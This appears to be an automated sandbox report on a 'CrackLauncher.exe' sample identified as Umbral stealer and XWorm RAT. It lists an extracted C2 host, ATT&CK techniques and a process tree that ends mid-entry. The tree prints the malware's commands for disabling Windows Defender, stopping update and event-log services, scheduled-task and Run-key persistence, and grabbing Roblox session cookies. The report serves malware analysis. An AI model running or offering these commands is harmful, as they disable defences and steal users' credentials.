umbral | 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Analysis

max time kernel
24s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CrackLauncher.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xworm evasion execution persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000800000002353c-43.dat	family_umbral
behavioral2/memory/5052-50-0x000001619AD70000-0x000001619ADB0000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3672-100-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
524	powershell.exe
2664	powershell.exe
4464	powershell.exe
3288	powershell.exe
4612	powershell.exe
1984	powershell.exe
4656	powershell.exe
2704	powershell.exe
664	powershell.exe
3544	powershell.exe
4348	powershell.exe
5104	powershell.exe
3464	powershell.exe
2484	powershell.exe
4276	powershell.exe
1444	powershell.exe
4504	powershell.exe
640	powershell.exe
4464	powershell.exe
4784	powershell.exe
4564	powershell.exe
1896	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x000800000002353d-66.dat	net_reactor
behavioral2/memory/4284-80-0x00000000004A0000-0x0000000000688000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe

Executes dropped EXE 6 IoCs

pid	Process
2324	Nursultan Setup.exe
5052	Запустить Nursultan.exe
4284	Nursultan.exe
1808	Nursultan Setup.exe
5072	Запустить Nursultan.exe
664	Nursultan.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3220-568-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3220-573-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3220-576-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3220-577-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3220-578-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3220-579-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
30	discord.com
37	discord.com
38	discord.com
29	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com
35	ip-api.com

Power Settings 1 TTPs 5 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4428	powercfg.exe
4676	powercfg.exe
1456	powercfg.exe
4468	powercfg.exe
1764	powercfg.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4284 set thread context of 3672	4284	Nursultan.exe	113
PID 664 set thread context of 4000	664	Nursultan.exe	169

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
640	sc.exe
1416	sc.exe
1896	sc.exe
1536	sc.exe
5112	sc.exe
3004	sc.exe
336	sc.exe
5008	sc.exe
3668	sc.exe
4696	sc.exe
4824	sc.exe
2476	sc.exe
5076	sc.exe
2696	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4788	wmic.exe
4868	wmic.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4052	PING.EXE
1996	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
888	schtasks.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
4784	powershell.exe
4784	powershell.exe
664	powershell.exe
664	powershell.exe
664	powershell.exe
3464	powershell.exe
3464	powershell.exe
3464	powershell.exe
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe
1692	powershell.exe
1692	powershell.exe
1692	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
392	powershell.exe
392	powershell.exe
392	powershell.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
3544	powershell.exe
3544	powershell.exe
3544	powershell.exe
5060	powershell.exe
5060	powershell.exe
4348	powershell.exe
4348	powershell.exe
5060	powershell.exe
4348	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	664	powershell.exe
Token: SeDebugPrivilege	5052	Запустить Nursultan.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	3672	MSBuild.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	wmic.exe
Token: SeSecurityPrivilege	1020	wmic.exe
Token: SeTakeOwnershipPrivilege	1020	wmic.exe
Token: SeLoadDriverPrivilege	1020	wmic.exe
Token: SeSystemProfilePrivilege	1020	wmic.exe
Token: SeSystemtimePrivilege	1020	wmic.exe
Token: SeProfSingleProcessPrivilege	1020	wmic.exe
Token: SeIncBasePriorityPrivilege	1020	wmic.exe
Token: SeCreatePagefilePrivilege	1020	wmic.exe
Token: SeBackupPrivilege	1020	wmic.exe
Token: SeRestorePrivilege	1020	wmic.exe
Token: SeShutdownPrivilege	1020	wmic.exe
Token: SeDebugPrivilege	1020	wmic.exe
Token: SeSystemEnvironmentPrivilege	1020	wmic.exe
Token: SeRemoteShutdownPrivilege	1020	wmic.exe
Token: SeUndockPrivilege	1020	wmic.exe
Token: SeManageVolumePrivilege	1020	wmic.exe
Token: 33	1020	wmic.exe
Token: 34	1020	wmic.exe
Token: 35	1020	wmic.exe
Token: 36	1020	wmic.exe
Token: SeIncreaseQuotaPrivilege	1020	wmic.exe
Token: SeSecurityPrivilege	1020	wmic.exe
Token: SeTakeOwnershipPrivilege	1020	wmic.exe
Token: SeLoadDriverPrivilege	1020	wmic.exe
Token: SeSystemProfilePrivilege	1020	wmic.exe
Token: SeSystemtimePrivilege	1020	wmic.exe
Token: SeProfSingleProcessPrivilege	1020	wmic.exe
Token: SeIncBasePriorityPrivilege	1020	wmic.exe
Token: SeCreatePagefilePrivilege	1020	wmic.exe
Token: SeBackupPrivilege	1020	wmic.exe
Token: SeRestorePrivilege	1020	wmic.exe
Token: SeShutdownPrivilege	1020	wmic.exe
Token: SeDebugPrivilege	1020	wmic.exe
Token: SeSystemEnvironmentPrivilege	1020	wmic.exe
Token: SeRemoteShutdownPrivilege	1020	wmic.exe
Token: SeUndockPrivilege	1020	wmic.exe
Token: SeManageVolumePrivilege	1020	wmic.exe
Token: 33	1020	wmic.exe
Token: 34	1020	wmic.exe
Token: 35	1020	wmic.exe
Token: 36	1020	wmic.exe
Token: SeIncreaseQuotaPrivilege	4656	wmic.exe
Token: SeSecurityPrivilege	4656	wmic.exe
Token: SeTakeOwnershipPrivilege	4656	wmic.exe
Token: SeLoadDriverPrivilege	4656	wmic.exe
Token: SeSystemProfilePrivilege	4656	wmic.exe
Token: SeSystemtimePrivilege	4656	wmic.exe
Token: SeProfSingleProcessPrivilege	4656	wmic.exe
Token: SeIncBasePriorityPrivilege	4656	wmic.exe
Token: SeCreatePagefilePrivilege	4656	wmic.exe
Token: SeBackupPrivilege	4656	wmic.exe
Token: SeRestorePrivilege	4656	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 4784	3096	CrackLauncher.exe	93
PID 3096 wrote to memory of 4784	3096	CrackLauncher.exe	93
PID 3096 wrote to memory of 2324	3096	CrackLauncher.exe	98
PID 3096 wrote to memory of 2324	3096	CrackLauncher.exe	98
PID 3096 wrote to memory of 664	3096	CrackLauncher.exe	99
PID 3096 wrote to memory of 664	3096	CrackLauncher.exe	99
PID 3096 wrote to memory of 5052	3096	CrackLauncher.exe	102
PID 3096 wrote to memory of 5052	3096	CrackLauncher.exe	102
PID 3096 wrote to memory of 3464	3096	CrackLauncher.exe	103
PID 3096 wrote to memory of 3464	3096	CrackLauncher.exe	103
PID 5052 wrote to memory of 3312	5052	Запустить Nursultan.exe	105
PID 5052 wrote to memory of 3312	5052	Запустить Nursultan.exe	105
PID 5052 wrote to memory of 2484	5052	Запустить Nursultan.exe	107
PID 5052 wrote to memory of 2484	5052	Запустить Nursultan.exe	107
PID 3096 wrote to memory of 4284	3096	CrackLauncher.exe	108
PID 3096 wrote to memory of 4284	3096	CrackLauncher.exe	108
PID 3096 wrote to memory of 4284	3096	CrackLauncher.exe	108
PID 3096 wrote to memory of 1600	3096	CrackLauncher.exe	110
PID 3096 wrote to memory of 1600	3096	CrackLauncher.exe	110
PID 5052 wrote to memory of 1692	5052	Запустить Nursultan.exe	111
PID 5052 wrote to memory of 1692	5052	Запустить Nursultan.exe	111
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 4284 wrote to memory of 3672	4284	Nursultan.exe	113
PID 5052 wrote to memory of 968	5052	Запустить Nursultan.exe	114
PID 5052 wrote to memory of 968	5052	Запустить Nursultan.exe	114
PID 5052 wrote to memory of 392	5052	Запустить Nursultan.exe	118
PID 5052 wrote to memory of 392	5052	Запустить Nursultan.exe	118
PID 1600 wrote to memory of 4564	1600	CrackLauncher.exe	120
PID 1600 wrote to memory of 4564	1600	CrackLauncher.exe	120
PID 1600 wrote to memory of 1808	1600	CrackLauncher.exe	142
PID 1600 wrote to memory of 1808	1600	CrackLauncher.exe	142
PID 1600 wrote to memory of 3544	1600	CrackLauncher.exe	123
PID 1600 wrote to memory of 3544	1600	CrackLauncher.exe	123
PID 5052 wrote to memory of 1020	5052	Запустить Nursultan.exe	125
PID 5052 wrote to memory of 1020	5052	Запустить Nursultan.exe	125
PID 5052 wrote to memory of 4656	5052	Запустить Nursultan.exe	171
PID 5052 wrote to memory of 4656	5052	Запустить Nursultan.exe	171
PID 5052 wrote to memory of 3504	5052	Запустить Nursultan.exe	129
PID 5052 wrote to memory of 3504	5052	Запустить Nursultan.exe	129
PID 1600 wrote to memory of 5072	1600	CrackLauncher.exe	131
PID 1600 wrote to memory of 5072	1600	CrackLauncher.exe	131
PID 1600 wrote to memory of 4348	1600	CrackLauncher.exe	132
PID 1600 wrote to memory of 4348	1600	CrackLauncher.exe	132
PID 5052 wrote to memory of 5060	5052	Запустить Nursultan.exe	134
PID 5052 wrote to memory of 5060	5052	Запустить Nursultan.exe	134
PID 5052 wrote to memory of 4788	5052	Запустить Nursultan.exe	192
PID 5052 wrote to memory of 4788	5052	Запустить Nursultan.exe	192
PID 1600 wrote to memory of 664	1600	CrackLauncher.exe	138
PID 1600 wrote to memory of 664	1600	CrackLauncher.exe	138
PID 1600 wrote to memory of 664	1600	CrackLauncher.exe	138
PID 1600 wrote to memory of 3740	1600	CrackLauncher.exe	139
PID 1600 wrote to memory of 3740	1600	CrackLauncher.exe	139
PID 664 wrote to memory of 4000	664	Nursultan.exe	169
PID 664 wrote to memory of 4000	664	Nursultan.exe	169
PID 664 wrote to memory of 4000	664	Nursultan.exe	169
PID 664 wrote to memory of 4000	664	Nursultan.exe	169
PID 664 wrote to memory of 4000	664	Nursultan.exe	169
PID 664 wrote to memory of 4000	664	Nursultan.exe	169

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2296	attrib.exe
3312	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2324
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2664
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3328
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2460
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:640
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4696
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4824
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:336
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4676
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4428
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1764
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4468
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:2476
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5076
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:664
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5052
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:3312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:392
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5060
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4788
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:2004
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:4052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3464
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3672
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4464
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4276
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4504
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2704
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:888
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:1808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Executes dropped EXE
    PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4348
- - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:664
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4000
- - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
    3⤵
    PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
      4⤵
      PID:1608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
      4⤵
      PID:4152
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
